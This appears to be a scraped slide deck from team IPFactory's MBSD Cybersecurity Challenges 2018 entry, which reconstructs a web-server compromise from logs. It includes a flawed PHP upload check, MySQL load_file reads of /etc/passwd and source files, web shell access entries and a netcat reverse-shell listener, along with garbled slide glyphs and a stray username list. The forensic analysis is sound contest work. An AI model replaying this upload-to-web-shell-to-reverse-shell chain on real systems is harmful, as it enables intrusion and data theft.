チームIPFactoryとして発表したもの
MBSD Cybersecurity Challenges 2018
View Slide
▋▋▋▋▋▋
▋▋▋▋▋▋▋▋▋▋▋▋▋
▋▋►►►►
▋►►►►▋►►►
sendmessage.php▋▋▋$prefix = md5(time() . $user->id);$tname = $prefix . basename($_FILES["file"]["name"]);if (move_uploaded_file($_FILES['file']['tmp_name'], "./tmp/".$tname) && preg_match("/^[^.]+¥.jpg$/",$tname)) {
sendmessage.php (2018/9/21 14:46:48)180921 14:39:24 26247 Connect [email protected] on mysql180921 14:41:06 26247 Query select load_file('/etc/hosts')180921 14:41:12 26247 Query select load_file('/etc/passwd')180921 14:42:30 26247 Query select load_file('/etc/issue')180921 14:42:45 26247 Query select load_file('/etc/httpd/conf/httpd.conf')180921 14:43:32 26247 Query select load_file('/var/www/html/webmix3/index.php')180921 14:44:30 26247 Query select load_file('/var/www/html/webmix3/login.php')180921 14:44:54 26247 Query select load_file('/var/www/html/webmix3/libs.php')180921 14:45:25 26247 Query select load_file('/var/www/html/webmix3/class/class.php')180921 14:45:45 26247 Query select load_file('/var/www/html/webmix3/class/User.php')180921 14:46:48 26247 Query select load_file('/var/www/html/webmix3/sendmessage.php')
Web Shell (2018/9/21 15:12:46)192.168.11.2>>
Web Shell (2018/9/21 15:12:46)192.168.11.2>>7449f92ea0f26445e89ae968227efaabtest.php
Web Shell (2018/9/21 15:12:46)192.168.11.2>>7449f92ea0f26445e89ae968227efaabtest.php[Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Notice: Undefined index: cmd in/var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1[Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Warning: system(): Cannot execute ablank command in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1
Web Shell (2018/9/21 15:12:46)192.168.11.2>>7449f92ea0f26445e89ae968227efaabtest.php192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.phpHTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
Web Shell (2018/9/21 15:12:46)192.168.11.2>>7449f92ea0f26445e89ae968227efaabtest.php192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.phpHTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"192.168.11.204 - - [21/Sep/2018:15:12:46 +0900] "POST /sendmessage.php HTTP/1.1" 200 1783"http://192.168.11.2/sendmessage.php" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101Firefox/52.0"
(2018/9/21 15:29:02)$ nc –lvp 4444192.168.11.2>
(2018/9/21 15:29:02)192.168.11.2>4444/TCPで待受中…
(2018/9/21 15:29:02)192.168.11.2>$ nc -lvp 4444Listening on [0.0.0.0] (family 0, port 4444)Connection from 192.168.11.204 64495 received!sh-4.1$
(2018/9/21 15:29:02)192.168.11.2>$ nc -lvp 4444Listening on [0.0.0.0] (family 0, port 4444)Connection from 192.168.11.204 64495 received!sh-4.1$192.168.11.204 - - [21/Sep/2018:15:29:02 +0900] "POST /tmp/7449f92ea0f26445e89ae968227efaabtest.phpHTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.phpHTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
▋▋▋
▋▋▋POST
▋▋▋POSTPOST
( )▋►►
POST▋►►
38
▋▋▋▋▋▋▋
▋►▋►▋►
▋▋
▋►►►
8ayac
makamaka
jordihofc
k1low
hanhan1978
masashi_sutou
dskst
tsubakimoto_s
carta_engineering
mizunohiroaki
kako351
oekazuma
ybrliiu
jcasabona
dougneiner
lemiorhan
afnizarnur
holman
swwweet
sachag
panda_program
zenorocha
paigeccino
thekraken
aarron